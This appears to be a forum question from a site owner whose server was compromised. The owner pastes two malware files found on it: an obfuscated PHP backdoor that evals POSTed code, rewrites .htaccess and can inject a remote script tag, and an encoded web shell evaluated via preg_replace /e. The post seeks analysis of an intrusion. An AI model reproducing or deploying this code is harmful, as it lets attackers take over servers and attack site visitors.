# What does this code do? .htaccess keeps getting changed

Tags: php, apache

```
$vf = substr(1, 1);
foreach(array(10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 80, 104, 112, 79, 117, 116, 112, 117, 116, 39, 41, 46, 115, 116, 121, 108, 101, 46, 100, 105, 115, 112, 108, 97, 121, 61, 39, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 80, 104, 112, 79, 117, 116, 112, 117, 116, 39, 41, 46, 105, 110, 110, 101, 114, 72, 84, 77, 76, 61, 39, 39, 59, 10, 10, 13, 9, 92, 39, 0, 112, 49, 60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 104, 116, 116, 112, 58, 47, 47, 102, 97, 99, 101, 116, 111, 102, 97, 99, 101, 46, 100, 101, 47, 101, 120, 116, 47, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 116, 114, 117, 101, 99, 115, 115) as $vj[0]) {
    $vf. = chr($vj[0]);
}
$vj[0] = substr($vf, 0, 1);
$vj[1] = substr($vf, 1, 102);
$vj[2] = substr($vf, 103, 3);
$vj[3] = substr($vf, 106, 6);
$vj[4] = substr($vf, 112, 2);
$vj[5] = substr($vf, 114, -7);
$vj[6] = substr($vf, -7);
if (isset($_GET[$vj[6]])) {
    $vj[7] = 0;
    if (isset($_POST[chr(97)])) {
        $vj[7] = $_POST[chr(97)];
    }
    $vj[8] = chr(97).chr(106).chr(97).chr(120);
    $vj[9] = 0;
    if (isset($_POST[$vj[8]])) {
        $vj[9] = $_POST[$vj[8]];
    }
    if ($vj[7] == substr($vj[1], 79, 3) && strlen($vj[9]) == 4) {@ob_start();@eval($_POST[$vj[4]]);
        $vj[6] = $vj[1].addcslashes(htmlspecialchars(@ob_get_clean()), $vj[3]).$vj[2];
        echo strlen($vj[6]).$vj[0].$vj[6];
    } else {
        $vj[0] = chr(116).chr(120);
        if (!isset($_POST[$vj[0]])) {
            echo $vj[5];
        } else {@eval(urldecode($_POST[$vj[0]]));
        }
    }
    exit;
}
unset($vf);
unset($vj);
if (isset($_GET["wt67183456vvvg3"])) {@unlink('/home/myroot/weburl.org/.htaccess');@unlink('/home/myroot/weburl.org/.htaccesswt1');@rename('/home/myroot/weburl/.htaccesswt2', '/home/myroot/weburl.org/.htaccess');
    $l = "http://google.com/";
    if (isset($_GET["l"])) {
        $l = $_GET["l"];
    }@header("Location: $l");
    exit;
}
```

My site has been compromised and this is one of the files I have found. Still trying to understand how its working

Another one found looks like this:

```
    $auth_pass="";
$color="#df5";
$default_action="FilesMan";
$default_use_ajax=true;
$default_charset="Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwB d1zTZNDtOKicPUNGlm4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBsoDeXKainkKVZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHBM+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MLlqWOHOtQw5fJRbyFoQ/z2571EBTA4FeRV6cPpk3r0pY97LmBlggo8kpTA0Wbib2UeqCnkHLPsmFWXF7ieroG/8QgCc55kByIBgF/XwCc54zpd2m1RkMHC3GJo6nQB+/CpRkFF2rrD+uGmv0oeCC72PV9r1SAxdCaelEH1v8O5uV0TAHWAyt0kv2IGYduGLFdN3DsyA9uDdZqMwM6Hdu+7457zMU9qDIZTuAXs6dBAGsJQwAJydZCtjZja90ENC78i+2P++7gl+XKq9C0Qw79GbOAea4dBlljh/MRLzl2ojCyIrZqjWNY2BvGwJ2wkgTXru0kkDCyVkBb7DnkAU4btrVIycc9M0Zj+yNY7JxAyb92nRnmb598YGfI1jzLCiZAAGYcfGA7RP00sJBKnu9OeJPYmuV5BivJ6ThnGOJu8UK26g0JsYcZfdeDtTyCbaALhIUM1lWLHbrj6Q20FarowfYcOdD9PQ4a3oaRM5K4sCBbvSZ0ITbQnzhjAMXJnO1N9jcbwCRgqy7Duh3q3kngQ3+G2I/RVJSZhMya3six5mn41ceRh/aycOpyekQBylhjq7iLsD5bnTiwHa1Wn1WrVWhuGJdNyuXyDMFUHkZDJAyWIqGeIWHwPSRk0PDRr7hjm2bAAkJwq02Bp7D88mDxS0NAXhr5ZZdqy1xU2J+zwI2Q/Vnf90BgBA4Y5/Yv75B6Zjzml19I2zx0YqJXJrPe g72jwCbDnC6/fA/loUOSKsOI5KeHCYoh4/KpsssTk0VFpHRBYuwMYRLDyv4wOSp0QlIWxyPIykVJpPVh9x6OLNcL7IcpU4ATwjIYHkFXCuGhb1uRk6xgHn2zYRRNehWcCCqJmUylxPUQpOpwXhElVykDS2t/QT1qtloqvO3CMjGvUJKrlBndzoMXOQqs1Ru5Y33RymQp4HZ/kF7h9BwVFmqaByyyUtCwJvasaA48z8yWmF+DO8ivA9bd+SUgM7cEocqHn9MSLqYtpk8BymCQi3lOOQVWHepk7ExKNlW41NoZA0K6Bhf+6eXCQboGl7f+xcAyUysxb5mKS6kAWsnRLdS+sKgGoZWdswLFJZV8tVzXsq+meSPHMxTI3nSUB4fJ2vR3r3OnvXtNAqN6wn/DtTTi+Cu1UOJwNLQCOGyIA0QqDU/Yrw+PX20fnl6Y8pwQ5zbZwPO7lgfnFzhfBiCk2kOfGRvDaOS1N1A11N4YOZFFa96q8+fUvW6ZIO2CbBitnsHCaiL74VfLjEAQXcOCTSbwtwxYf7MUVZhhtjciN/KcNofIOecgFFvFozpDGEXNwyrGxhov/WQjjG7xb9fv3d7hMAwC1FqtUmsaPz579qwpfjo1/F/znkDLUa8cDe9AFBlHDfbrJGKHU9vtWeWPTtCzxlZzZAVw/m5Um9cOnHpty1sldUoj8icphOz+CYk1MOv7/h0Tmf1+v5klp16vI3w4scblYa1sSXDR+2zFHaFgbo0jCcZJXJ057mAIlHZJdMLMYe0OvgL4WvWcftR4PoHzgO+B6CpGcmL1enAgarA65EBuk7e19gwaK1uZT6FsO5SBinrudUUM8R2LkSJCDhdXn4NtfX0dUUA7kTdWe3Be4UekxtgfO5TVGPrQxVkAwOIEnsuhKiMvbm6jFreUhleSlFAEo4Y4+54/a8AxJfIJRdcdWIEDpMzcXjRs1KrVn5pD3q3 rVdFW0nSVkRQELYeOB+fOOxajXTi4z58/b2ZIlNMqYbT3/tiHkbWdMsyjaeDCmfTImZlYPWrSkto4ST9GcMAPz7qe6CLOhlyrR+2i/IPxRDaMUWuo0yyQioDLlXI4VnmkO/i/ZlwmEKMyDxIAYUBypxtm1e9yWeH+ySRw7oif+9bI9W4bogPKcZ8ACRtrYkpvhHbgTqL2Ewb/XVsBszuoyMLFABeZcOLYruXRqlJMVjgbNhjSkRhmMy5pzS+5JZcni4oZZlIdX6+WKJqsv4ggqXZSiwsXUYU38ZVCk5r5rWxcjo3SSqvVt7zQKW2aZiPbNBV+7+is89v58dneaSldV31RXfVH1lVfXNf6orrWH1nX+sK6UDfX8+3pCDi++eSHeEtE5ZpVtsuTWnlSL0/Wy2IQYIN88sMPsEVaK63x1PNKvcqoX7EqXGVtNUkJo6d1mryErZawRa6tlIjTZIlJTS0yqYn8SU0ppKTGxepasboEqKvFktS42LpWbF0CrKvFktS4WbxjtMbxJNkc/qU2NC8f8d0rIzBY0P9zRwdpoir4TUKxlEJqfS9S4ksrsEak7UYdaCsKpo6JebCuFt1WteluUNWwqiM3hRXPGQ+iYdN9+rQEUD+I4k+h/M/mUw30wv1WwePjU7NlPnXGtt9zzk8OdnzYrseQX8wAU88RYWFQpJkC21RyjSPlnZO93873Ts86gEysHmXRinTHAJpp4MW5gstZcQaHXH9W+fz+8A1IaCcgoTlhRM0JnD+hK8bOjOmZ1Oc/0GArCLZJ1/r5uPsHbHmp8lpe0Xzv2oEfwtGUagWJzSzx+Yr/IUooiQQy5T9Iqvhj2FR7t6hHBCnTGg/wEkJoF4G2HUpqZotNnHHRxMUCOof6AAe2lAUEVhBN5MIyK+qSahn4YjLxQJrDHl27WZ3NZqu4565OUaePg9ozc/GOe8V4VGTOvT4+6XYU44WI+q NCTT/FpqNO/lmJUR9DNtVAqlXMqFervCDn6MAZiDE4cQZ7N5PipVG8hP96T0vFC/xxiv+E334p4Y2FOTJpbHlZKwhaUL6C962ChBDYNXTOQB4QcA7waREAL+rfKuJiqVrGkhc1OEwQzD3XW1seCMJFU3QwvxRaMTmXwpYttmpxYkARu70BkiOjvbxlwg7hklhndUEumkZOU5HC8sV2kLRB4iLhsto0AXX6BpNfUY76so6eG04865aLllhAubccur2eM+YlrPlZ9vysSW1BXn1B3vqC6vj6BQD8EtVoskI/cJxTFIXwnguadIUJJBtlhByAjvzI8jTwDiV1liuhfG0qvxtwqikEsJxZIeGdDCedKVJcNAO6ybtygrHjpbL4JZ9zAzNsfIWLMB4ZG2trmOK7INx34RwxWgsdtHNY27Ro3rT4589wCgaBttNzOCdhDr9HE+KFSTceeMPO6y4xkC4YFy+SSistFk9lUYS947SirYTgcNm0crX8ohTfy+TikC2tQPl8DOslcWUqV4KOc+OGEVCMPH+D96HOwIV1JTYLEReYHaGvxDu7AK8yC3j1wfNGt/Cb0gZK2kCmwVyZQKqxaeDNJJF/FxePq53MEElCBaFUcMY5g2CgAQ4koKAWMV+YOMioLxD18ET4h9IkSYhbAeU18cQBB72nm9IOdjXt1HgpPbGiIfwmRoFO5xevWdYdt+jqrkjwqB6Bbb2A+zoruBuF8SpyLe7l2BlJHTCexobFhoHTb5k/mswf27AFXLXMASym+6h8eW+NYfW8NAyB8g9C+cdGq+DiX8So4yMCLgp/fKvQbW+qskujZLaNigACWcBY21iz2gZvO5/yyfWfeX62v/oS96ZPtBGHq7X68xp+vzs+eLl6Ev86x1/25OWLFzTP/EmsxZH9CMQ7lj0sJpVYIfRI5IxKKXi8p97waZoJWw7DrBBkBWQVs5LVLLValL1p8 jMxbJQN0yxVzHZcbmONI2xjj4yS9p06doUdjPu+2WrjB/0sm9TzmCSHwMTz8Bh2BwdT5c+yefqnRyXhT9n8MJzgB/6BnCjAG186ABMIfZ/RZ9l8FcA2A11iEz7lq2weOdHMD64wXf4Uk1jo1WLei40yuG5tdGEe+gN/ytVq8neTMk4drw/79QgOzjwXE074N0I442l6nEY0QFeo+0PLGA5DYwPzgTZIHJeiO45KRdgp1wT7j0rQ8T8Z7Qsm+dr40Yj52gC+NmFUrivmpVlGmb98ib/if0oGDtoVjpjVZt821qIhjVkvACEPeQknApoPxL3gh9gixcRCtiAgSce0oU//ggxsDWEpcauODllwUErFbFxe4iIoq6FmziM/npZIMRArUawR9RcsSUL6oRUmLYSouoS+o0tGG2TtsIU6OWY7nie0RK11+sLdEb+qopdRDGlvRAH8f08mtTdQ/9Y+x8WssdEN2mg+QD+A++jvm16P/u7Meg3cHOb12KaJULvU7gbNG9xPQGhC/ND9vbZJCfBjY+wDqLLTKBtsqcxANqvVq1Q8GXuETnYvPJZHVgDreKvT9azxVftC34CpwzbWqKINURmt6Yi0yPgnLvz4XWK8F17j+t4QJHOYgV6E7wBURmJF2q+dIIRFoShopvKnVt9haFukIVR6LzFH+gZ9hwojricFcbbXPj5CaWkctaEn1bwByEnQnd328f7+xlq3LaH03vpRZzQYytQkQY4RXAbkE/9wFuO074IAjzaIGuk9SCyaX1ZHqz32puE2QjHCoh9mof/RdWan7l8gUCRSltol+0C8hlIrE8uEvEjRhN7CRYEpWWsK5l9qVc4kP8Vjoe5RKMtQDR+cYBTuYO/lKdDmdpo+OxF5XFjaVZH6Xlt15NJzwRCG92lMnFwTcFYo00FORWHKGKCyVkyRDb4PIWF03ELKaBjz/omGbihO5EYb9z3OrJ7V dbyW8cGCg6jY6AxOj75ZMr63USFgK14zES/42QmAzdnBBzmC8QSID/oG/9vZ3t09Mb5J5uDFdzwXr62zxVU1wfvjsz0qzXtWzl/sLfiHfuGyJ7uOlkB+LjLELQGep+qJ6hxV88ZjlkaiiO9QNExJncpBzxDK6+dG20zbqO77fiRusAqwN8TmIC2mfGUYcdNg6iw3aZqb7eInKOBgiZKY6EZDh8S1oohmzBJ1DCgvueDYBZTD6SuzY7i9llS7L9lFTJ5C5/e2yOn6UeSP0plwXv0BexlO3LQP0GEXZCDSkqGsmjCy0EKCwAqSZlMYKtNJCLAIluLaFdh+VZ4Sx1DeTlPeG5j8XIqXBOJUKs17l9S0413ecibC0LD89l3C7OXLipDektb2pSpNa+ilIVp64lj8tvk7Gtp/FN2c5ecOUdIEkmWpAeboCobA5A3pLW7Ie+tKGzB1ijyiTb3/DWOB7cIuNxe2RR2U72zMvz9A8bEiM53mtWWPvBWcfzKPvnt+CGUXahIik+0d7Zx9+bDXMkdTL3InVhBRuVWQPiyTCs5TeMnKOHtujxdCa9M/Ndtpsi8oO6nJwlMQOa0eVri4Mr7JqlWmrcHju7XNTJIQpQVNXFyner+f+ciE9lHM1w0Y01lQbou0u4AoSspQMozgSgDyI0iriwxdb2NwZwah/VIMODKW9d/KzNTLmqWWvHnTvF1SmqHCBHI1pr9/mDjSFX0ncVT2QeK4NiqfOFWc2LspFtwxSRNwCBdHa6Q+o4hDBTjXv22RLhyKlbEMqVGo6NYfvjsu4qWlzOBqtVx0qA6IhsGUo/S7HTIwR83clswiymLsAEL6Ps+xhEfHXNzceDsHM8/4frxDkFs6SUcIDEmywJyggEkTOKE/DVCN3Of6QryIwc4zAqOkokGFwWwIM6e4stV3/D4UwJM+ZsIxv49XH5BUrlXrz6COie35ISKl+sQYI3B aYEwOQKEweyqErN1itep/1v/zrPYSsMni4SSAA1G/aP5Uq9T7qCYO2ZoCyEp4nnn9SjjFKKievXz+nxcP4iEoxk9F73OwLEEKEkHl38nycdv5mexVRmKm8xmfCsTZ8JP9zKo3O1U837Va8mfBRfYPY7ISyO0EcjuB9HIgXyaQLxPI1RzIFwnkiwSymwP5LIF8lkD2ciDrCWQ9gbRzIGsJZC2BnMTeTvQ5RX2Wi8wXl6vSmXiTmYHJGtiwUhak+pKDzBaAPCOQJOGlQBtSmRtUmTRysk8lyjyc9Ycpqz1MWfWlTtmzxZQ9W4ay6rMHKavWH6asplNWF1VH+ZTJ7DOFMjlV3Nw5InQYfTlRVrZo+bJ6/EiJq5FAoKmMftzfB+KqUknDp9sWigATPvOwIJ12uSop4UaqIDmzzqsAFsXIeST6fErrz/v9R1Gq99KpbY25MtYNxFqa2eNDDmOUFP/XUC2nXjb18MIGNwQll7YA2Hxwu6brOSALUsjsvsVwODjwEDcPygovyDxVQiXDTJnc5Vhtxqehi3pzWhDlrREXBcwZZnFV5ERX5tNtUTw+9BlXxEULtRZ+LSnuKUhZoRjfNqWOeViTWp8QjgfAB7cMFQfBiEwLQNirca0IFzKF+SQOizYojv0BrQqKhXHsGnsNLYoCF9KuhXcjpYtqSZ6lNo5xtBtMiLjaVWnhuszI/gpWyfiKlBAAdqmWFLwm8KK7MCd15NV4BRyUvHpNPhAqxaZsvd+PZlaAthV4R+mMryGLq7pOj/fPPm2f7JnigjQjk1gTyx46JMKM/N4Ur4O462tSyyHI8k6PbRMkk1DlxOkdxMsyyyIqlrBSDdUul0177MObD2w/FlDVi8Yc8XVzYW7DRFsDM13VMUwL1sW7czr9K36xOGE6mIMZGRJjvThDiSxTONaKk8DWeQCFO7a9ac9ZgEVA5COyz08OWTidoDkylM8MHj C91xHKfbO0acL8xd41sUtoDwBpddLiV4Bzxp+b53MJFjWgHZxBdEWEZWllMN7fnv7psaJRyQUulipGyZiDPcQCwnU0jfX09LfDOeUmgzmFPsAhfBA480v6tjun6HFggZBupMeK9y6wJJ7gkSuyrE1ISsm6w6du/uUceniL9Sqp5ERsgmzNiew14YCB/KDsj6aaV9o0bp2QLb4xJ80QWhxdGlSW/+QY6Pr7Ap1mScdvSI5YQFY4tHr+LJ8skfcPyOIYliLr+JRJngZicBPiLMfXbxjjNTTzWov5PmeRiQJSH8wrj2S5YTh1KmMnkkvjSu7VV2ww0p96yXX6wMbbVo/+5T9hPM2RdYUX2xO6FweRAO/KJ7fREBtiBtPuLfyBsyT8O/jLRZhu8qcOf8eEidxP4Ac64RIS8vRHVXKQEHBlXWMBv7eOBbs92w8cJGF6jcICliaAXjBzupgO+8oI/wZXwykarWPS8Crw/ejKhaXFdCckRIX0sz9DQgN3MnMDomToOl6P2kkey9CLAbYlHNO6BMwP+y+S7vZCqzfCwjbOnwHC3Lg9atUAdgf7iv+cYegUzLwNR1aIiX+NukD4hAifjVwPu24GO7lozdgd/2HxjvBnY1Quoetq3BszGF+AIochrOF2fEPkjK+wQbhKYp8TjDebrI5ctJsz0xM6tVqK63WQn+TwJ4YcwC6JIERJ6lJDKSmmPOc40mtLvLTMrVyM/D+pe5dQfEfVSl//o/oTPHOJiEdiDYdCK/5md5eRJR2UEHJmr89Wh9mZ/wbdOxdNevL/NFP1cYFO18vBboero6Gu2CWpfRaaxZRm21TvPo3nBldsk8WqMD5XUur5+m5T2j+09wN/xC8WI/02IVFtc9RCG1pVryEFjjN/GQx1gQEP8jl3mXP1r0a7bUj9q1D6kdKY6Q4MTHUxIJUlbC/j6cgJXFuDnJu3LsM5Ia8IRReaiDXV0 myjpdWkZQpztHzbPI0G3g6EFEyNh2jSS4JQVab0Cor1iqVLHsvibA9jyYFL7vGxLb3ZfZSbnWBu2NiyrL3NI2awUyfC+C9hDI3BMWQ4jWwxiraxLbPVMrioEXzcENKU85bIW+KcQ9mH4aSYG/4njp5yt2xknziGijQm17StZBWt+t3IpQpZQDqjVGAY97jF/6vbg14RbUmOpxFwrFmq0GVwRVgkt0yzuVQpF4TH4M3Z+8OW9BiwpctA5h5WV/6W6Mh3GVxGl5fmZdUQDlDELtTHMmwNcQU/HwoeScJ7ZfxKRb/i7FjRc6hTSt/R21XOJsmBOhvLSU5ILYUkXHlAuFOO4Xicw/R5Z27hIFqZsDthXA6LTfNeepmZ+sgLkx8ys41ovNNKdpFMcdhkvCDawNAQaqWIlz1/W43L2dO/yc+URT34/2GZDWvw/3WgvfLL/coodMmcc4Xnsrti5ZeSkrzhjgYX/9P+9rQt00plFteCIBWnzCpw0K8M8f8JR6F2jzkmwiKVpWToY0qxy0AU2RjWTQHEKmL6CVHkXunbPRmpDQ/Nq2gQPbeXaUfiK3tfM9KPdykDRpp2IeSEColkTq90Z+lWWPxKFmqSu9Q9Ll13g4VQ3Laoea/taLBDSEdOcdeIx2JOtvAFRTsPwLoDGW2zUszj8c2F/nglbgQLG5aoaf6etQd/dCMZshF5PrkhUxne6VooNuqirn8jLnGh1+R2yS10HwwUVRETeNMUvS1tdhl6tMAyjNaz22+3P8urTFQD8S7hS5KkF6rL65qUxwVHrrcNTYwSvZKmltNXkrsHF2DqoYeWQXVPQdXVkjuLtNsoxgpkIlKJ3mb29fBc+I07+nQMmxlQQ9dUGvDCxoYzF0M4aumQbKPSSL07bxCSLTQi7vBkp9dBEROK7h8c7p1SXRcmzOQOt7pHqUfN4akloQE0duBQAztwcku+AjtEFzj3qilq 5zYrsuIrNQgbLc06JhuKRg55KKHuOIWr53hOhK2I+5un7CJS0ssqilwZ2Y6+y6u1UqtFkdU2OUSD/hUW97r6WfgDCP0z42eDlMqZaR4jd0zCcKzi7IBDz4qoiiGLW3HswOh6lYrB4/nlZhqIHtdCdzx1cI/AiDMt6l/8KWCFhMczWzzUWkntEQFFwhpwFp4i48R7RtemsjlNthWM1MbfC5NrfpiKvXE528YW50kqHav68l61T/trpWJqzcBrXzjBold+T1zYKnbdeOWgEN/PUM4veDWGgONMJLg6mS0wB8UGb/uTW1MzC8CUDpUqFuxyISwXYM9QqbArhbAESYJTe/iJsQZxcsYMYvNUwSDiPjvmDrwdUHiD3zb2MbIfjSyGqYq/K3g9ohEFqJEpy4U+TL2e+FKu0pFSPmM5qWwLi/MvUYIvSfEYqUuMGCW1xjjfhtlOtWZcZeK68zqZPBK0Tqbl5f/tTt76N3oZqOVTW+3iSk4XVwRvL+hl1K+J2UU7YKwm/upOtnmgX2GKAZDCxzPJKsrFAjJX29zwQjva1qisjJGpkFtqLm7jgvmudWOqC3DvI1pgOPfzAMosXgEEngxpHA1fegMr8oPYtdWewjn02jkQ6fJvUcuNA1XG2YU+sYGmOYpxk2uNc9tqF7gkKbo6aQGU8HDxRCe/2xJ5Ft7GB2bRs1knNELBLVi00/UcNpiO/zkjLDGeKpvk9Tjlg4waAGVn/rLtWtgyVCfP58G0oKRETXZQ3eqQ6RHIihSgWpebhKogwhgc/b+u6VJXL5Q6LErvzFi/xzJYS825Q3rPUIiLMuJbcrI1+3SwgqMaRp8usVW2/qKKJ1mxt4moSo1FEp92VKZuVPRTXMLVQbDORLbUN/Q0rI2aRz1UbrzxiqvbvCtsnAZsZI2tgRPMPz9z1+5JrYOhKDCuRMswmrHLN0ljbiAc7fl9vLQ2yMb13VQ+Gtm hQFZTkakCGyd7B91OIhL9GJ4CRTDJFbOpSfj8JIiNl+GtQj+ImvxPor0XNzW1xcJ6Kuz6StgpXmyv/vXtaalTvOzd1e5LK6nBhC8CxlVTq5EnX9QAgjx4xHf9W3JyMeK4N0rwB0uEE1AjWZCNxNxgFkB0GgTjUkjh05SnS5Ogf8iDFadGDMCSzq3GuekAANyXgjtGmOgZYUpLWwwtZGoOFGbV1NwrzHrs589NcCnWnRq0nOuXhzH+9cmNbl0dH5rj20HsO0mDPbzq3rTJ43ED/38Jt2DuG2aEdLzqGHDwxgGFEdysNmqokcV7xSPI425134M5hAk+DzPaP34/5pHfc/u383C/p1wN+/Fs7ARr5O33fTWSOdK8CtFsCdYENJ7Qat3mBhX8G28ADL6ohNI4KLlwIz9w+BKusMliofqDkzt4M/YF92c5une6qPGxuSoW9NfmPvJBjos8lSE3sNwyXDOoLi3k2atDokE0CB08Ky1VZkD5ABJw1slQ3DaNaFfKWOqzDIlYNQ4PoVvo/pdTGgojn1JZqjYklcfiFmAp6mPeXH8m9RGbyu/GgqGA8tTfvPwgSMonvxsLhoWVUmLtw72kWqYJqcUJBui5OZqU5ehGFPkQaDK5I4wu+fLj7zJVIZMvWxNiRTmE/mIKnq14VVDggrPVt1IpRwp/kBRSt+tp8mj2SCqlNdG9wt24FPBAlHwXVo3gdkYwahZsmF0py6aKwV5DQfaJ+xIr6yiwoaTyLkLBusgpiiykAnXzgUq/ZOuFtavWWK2VdLPMIlbEifnGNoBs+YGKqtUaa4A0sRAZiJuYxm0j4Wxq8E7ApzNEBna3lq6vgbL/ORjPQyA0EqkqpwVeKD4mSO/4AJXH3qbcEr2a1AqnL2t1/bPRv/hmJMEilBAp/VjJiMEjUhutuAPOOhIDFVSUOOdbqyUm0qYZexhza57YO3tunQDCLk207BGxDb Iq+wS8YebFF+jL2VOhiwSDO6RLHTDk0pyjITbRKNmg6KMt8y7Juzfp0s1ED/QLKr+IDDqyfEM3dX5/YCV9Na9jdI/wmOsaCSy/iZBYMF1sH98yGXxRpvgl9M0XWRVuke/3I0bmEgRNoEJGncCOpi3oG8upKz8OxOP4gKtwqL4T7rf/LyKP/Kk9JNxniHsuD/+rlTo9N6I69/719kgzG0K/S02Kb7SEMYYpVhZYMqoYFyo+pYhoGbaP4vy49R90f1vOAdEiB8Sl/A+Xcz9+srR/4aPdCwV6EW2AcOIJr61Hz+GK6/YO/BuHwUlBkNYVRO5rZx6EuCxp79LfGIpbmy5SHYkB0bGh2qmNAQoDfLujCJ+leRVzHVX7fGzng8cO86lyqAFSqoDPyuCvUorw+FCtaZDogn9LCPGpO7bcuvjFAT5aFTlsjclac2iU8Rl+HnfDSfP7iCDzgwVqXe1hp7ROLG5C7EuqP7GlGEFJAygTFveOISOJGF9Gvc4bN+RWHBVyip1Hyyb92zB550t32Ljtok+U2k1+K23qrqyJ6ZV0RVZcWI2Hrk+VwEvSQCcbDm3o3NS7GD8IIOLyIlFz9+w5NiZBVg/9EtFG7/4+HyfAAZiOkqelMWJSFx8pegAjEmSFtutm6aRkLH1XCNCkRz1ugoh56FAz8NjZqiNMBVafIGkGhQKjP08ptqK0VigEc4mhGuuZFsbJ84nxBDFPnxbcEpKiuCVW65/Nsh/0BE2l2BKQ5OTpZIJycjC/i/qwtXTibUUnTc97DH3mT2ZFjNNytBXChOuSx5TMV1bovHjGBHF0JOlSUkcklWMYfq+pwYgkgDkPPA1J0mCRqZaOL0kxcx/6IAkhKE6Jep/hyb73nA2tkCsC8AsTw6FVU1Lxk6K+BbeTiCfxn5C2c7KzXpdpNtpiM3P7dOfggEU+e7P3mWclHATZkIqZBMWzE25Psnf3duLMH hpXxzmvDo6SYjiVIQugtQr5ECo5cSE+ran7D460MmIWJzkxCXzGYk4c643RQY6uk0Unxac7HY6YJQ1HidSklGAhGpZOTTBy9WqMCj7RKqv5bxgjVhaYIiL6sXyDUtcwK/wvtxwVIm1d+rABIyD8DgNGtZRqwFh5lPmibr1Y+ddsF3/++R9ZLlbm2i0qjoCcQWx/LPxCwgX+f2JDTnTcPADFPnyjdvVUxPuZZyuXimnFRR1kAdXMm3b7tP3cd5RkmdhCqhScYDDbhqJ2UJdlLbxhrlxn5JzWr0nqNjBGobFAwHtAqllrL2tNZ1Tweu17zemMrDkdBhnRbQ9NosSUQaJ0IzlTt0qElueb2+UE0d/STbPoYZTYFFGx6pNXMF4tpsFY3qjPSNPr9lrKvE9L+tnrs6WWsHwDv/lLWnxlZqi2ftT55J6LcYX56zqNeRMSw8ZkowQpJqYzEbVJmTnYv+qckc7Lc8MIiehi6j1XLXsPJm60nld/omg2P+jRKM0aJGPc7kauXwU9vWPKBYV+i1FOwmyrYr5SARypAOBhrHjcVo7RSx3MlyfiiIJsPkiE7OuYkl8eUUc++oXHISoen4VkjG5VfR1bp7z2/G5i04je2Ko1I1utlZKnYsnksMUtGfE3PZ7LdbvTsfvn1CluqZrerUGMu6K5pqDTdZIFnVFmOAqd46PDL7sHJ6VSbLAnZh9VBnvilhJImT+pHC/fnJ7E5+qOqRcJ3OmK6+kRcqUlwLJdEdstCt+TzA7NbTfgKL0lHNezrlMciXK3jkXiZ0XkhrCUT6i4oTRUhRhhx7tJdBMlBbLBo+rh7pPlcAEuI1caiZkMdpHubJTtD806Q25leSuWH9AR4OFFSw8PJoK+mjzqq5wxw75YTuZNKX7a0CZRnZ5DMokw7TEEDQlXs0k0qJWQcwjfXYTtN1NtdxpF/jgGw5rtwLKvYAmsBNNk8C4TEXXY r4g48RRNPmysraWKrcUvDysy6jB5XwRX4G7wIDGw7VcCpzf23b8cjJK7DDVATLrY2uafLfOpWgDJ5VvDU/PnsIUHvYV0zu3vFMHUBcAGFVwNl6JVKbF8p8UKoaUUQcmMk3oglnLuIUP3knZQ0Y2MdZMobWLVSccuddamsjYJk0W1DlTtaUFg5vobGHgW+WtojXsePQT9rPrrC6h6yEV9Qz4hsgtykXzFAt9jhtWS3iRiclNqGZXEOFyrLT8umTFyMVguR9/BQTaEsyG3Ht/K5Kd7J00ivnLSoNfyCEey+uYDqo+h+HbkRKuwEDvWiF854llxq6+bnpLUhtG/uKlWnwKxpCJ/TeRhdEsG/pqUmQj91Zehv4RnonJ6Y1sZdy8RZZLFKkXcH0TnZYZzAcHmzNQI1itiBl6wGFniHrCbo3PbgpMetkkjeSs9CeSdLKEb+xHjgGlvlcSWbY4bqWo/keG74gp3Kb3TnnGgrsov1dQecZCAwrxCBxTcNedBiXnlkq4kn2Yh+onQ19ltd2vOpKrE4cRh7VUQFHPXA+36NDFf0TA2MNZUjDYxVlKQp6xm1OJxQcWGSimp9j6/dh2oCTIoj9IxO9y1Ro82XskxA8Lm2NwIKL+Htm16wH05TNYiTNxkbElMo1xMGzLuPJ8ieTJhKT1F6XZfFMhf7kvamxM40qTlcwdDD6OGk0JSbhyY4dzgW6z4c6/ncoUq3lPjjxNHmIWaZ3jda8YvxCgVLAJOPe8gNR9m7o16opbhodQV6VRrn4ymblZUa5Zrusmlq/ViUc9otXTdAD5CwF9OuK5I04MGIZAPKCQRKcTwpJ3U6qqTGo1IY04AqYX7B39DKL1/MGUDYaU53n6ZLQX9oFLrtur+Z6b80YYxPzT4njNXQlCWZ2V